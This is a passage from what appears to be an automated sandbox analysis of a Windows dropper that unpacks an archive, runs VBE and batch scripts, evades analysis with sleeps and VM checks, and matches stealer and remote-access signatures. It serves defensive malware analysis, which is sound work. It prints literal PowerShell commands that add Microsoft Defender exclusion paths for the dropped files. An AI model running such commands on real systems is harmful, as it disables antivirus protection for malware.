                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -598890s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 1148 Thread sleep time: -14400000s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -598781s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -598668s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -598297s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -597891s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -597750s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -597639s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -597469s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -597337s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -597203s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -597086s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -596983s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -596874s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -596762s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -596656s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -596547s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -596437s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -596266s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -596154s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -596031s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -595900s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -595796s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -595305s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -595078s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -594953s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -594844s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -594734s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -594625s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -594515s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -594403s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -594285s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -594156s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -594031s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -593922s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -593811s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -593703s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -593594s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -593484s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -593375s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -593203s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -593078s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -592962s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -592625s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -592277s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -592150s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -592031s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -591922s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -591812s >= -30000s
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                                Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F1A9A0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCurrentProcessId,GetCommandLineW,ShellExecuteExW,WaitForInputIdle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8F1A9A0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F0341C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8F0341C
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F2EBC0 FindFirstFileExA,0_2_00007FF7B8F2EBC0
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Code function: 1_2_0072A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_0072A69B
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Code function: 1_2_0073C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_0073C220
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F2104C VirtualQuery,GetSystemInfo,0_2_00007FF7B8F2104C
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Thread delayed: delay time: 922337203685477
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 30000
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 600000
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 599818
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 599656
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 599546
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 599437
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 599328
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 599218
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 599109
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 598998
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 598890
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 3600000
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Local\Temp\RarSFX0\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\Jump to behavior
                                Source: wscript.exe, 00000002.00000003.1685319760.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: f5Mb10zb.exe, 00000001.00000003.1672189302.0000000002C63000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\$
                                Source: wscript.exe, 00000002.00000003.1685319760.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: agentFont.exe, 00000005.00000002.1789284516.000000001C4F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3FQ
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe API call chain: ExitProcess graph end node graph_0-25486
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe API call chain: ExitProcess graph end node graph_1-25002
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Process information queried: ProcessInformation
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F22B90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B8F22B90
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Code function: 1_2_00747DEE mov eax, dword ptr fs:[00000030h] 1_2_00747DEE
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F2FC40 GetProcessHeap,0_2_00007FF7B8F2FC40
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Process token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Process token adjusted: Debug
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F22D70 SetUnhandledExceptionFilter,0_2_00007FF7B8F22D70
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F21F60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7B8F21F60
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F26608 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B8F26608
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Code function: 1_2_0073F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0073F838
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Code function: 1_2_0073F9D5 SetUnhandledExceptionFilter,1_2_0073F9D5
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Code function: 1_2_0073FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0073FBCA
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Code function: 1_2_00748EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00748EBD
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Memory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\mshypercomponentSavesdll\agentFont.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ApplicationFrameHost.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\agentFont.exe'
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F1A9A0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCurrentProcessId,GetCommandLineW,ShellExecuteExW,WaitForInputIdle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8F1A9A0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe"
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe"
                                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\mshypercomponentSavesdll\1fgSUpJ8Uk5BF.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\mshypercomponentSavesdll\agentFont.exe "C:\mshypercomponentSavesdll/agentFont.exe"
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat"
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exe Process created: C:\mshypercomponentSavesdll\agentFont.exe "C:\mshypercomponentSavesdll\agentFont.exe"
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F0D484 cpuid 0_2_00007FF7B8F0D484
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF7B8F19AC4
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Code function: GetLocaleInfoW,GetNumberFormatW,1_2_0073AF0F
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Queries volume information: C:\mshypercomponentSavesdll\agentFont.exe VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Queries volume information: C:\mshypercomponentSavesdll\agentFont.exe VolumeInformation
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Queries volume information: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe VolumeInformation
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8EF2C5C CreateEventW,CreateNamedPipeW,0_2_00007FF7B8EF2C5C
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F1FFD0 GetCurrentProcess,SetUserObjectInformationW,GetCommandLineW,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8F1FFD0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F04224 GetVersionExW,0_2_00007FF7B8F04224
                                Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                Stealing of Sensitive Information

                                Source: Yara match File source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: Process Memory Space: agentFont.exe PID: 2120, type: MEMORYSTR
                                Source: Yara match File source: 5.0.agentFont.exe.f30000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 1.3.f5Mb10zb.exe.65e7104.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 1.3.f5Mb10zb.exe.6efd104.1.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 00000005.00000000.1686628391.0000000000F32000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara match File source: 00000000.00000003.1663870017.0000025FF5CAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000001.00000003.1669628043.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000001.00000003.1668966554.00000000065A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe, type: DROPPED
                                Source: Yara match File source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
                                Source: Yara match File source: C:\mshypercomponentSavesdll\agentFont.exe, type: DROPPED
                                Source: Yara match File source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, type: DROPPED
                                Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, type: DROPPED

                                Remote Access Functionality

                                Source: Yara match File source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: Process Memory Space: agentFont.exe PID: 2120, type: MEMORYSTR
                                Source: Yara match File source: 5.0.agentFont.exe.f30000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 1.3.f5Mb10zb.exe.65e7104.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 1.3.f5Mb10zb.exe.6efd104.1.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 00000005.00000000.1686628391.0000000000F32000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara match File source: 00000000.00000003.1663870017.0000025FF5CAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000001.00000003.1669628043.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000001.00000003.1668966554.00000000065A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe, type: DROPPED
                                Source: Yara match File source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
                                Source: Yara match File source: C:\mshypercomponentSavesdll\agentFont.exe, type: DROPPED
                                Source: Yara match File source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, type: DROPPED
                                Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, type: DROPPED
                                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity Information11
                                Scripting
                                Valid Accounts11
                                Windows Management Instrumentation
                                11
                                Scripting
                                1
                                Exploitation for Privilege Escalation
                                11
                                Disable or Modify Tools
                                OS Credential Dumping1
                                System Time Discovery
                                Remote Services11
                                Archive Collected Data
                                1
                                Encrypted Channel
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts1
                                Exploitation for Client Execution
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                11
                                Deobfuscate/Decode Files or Information
                                LSASS Memory3
                                File and Directory Discovery
                                Remote Desktop ProtocolData from Removable Media2
                                Non-Application Layer Protocol
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts2
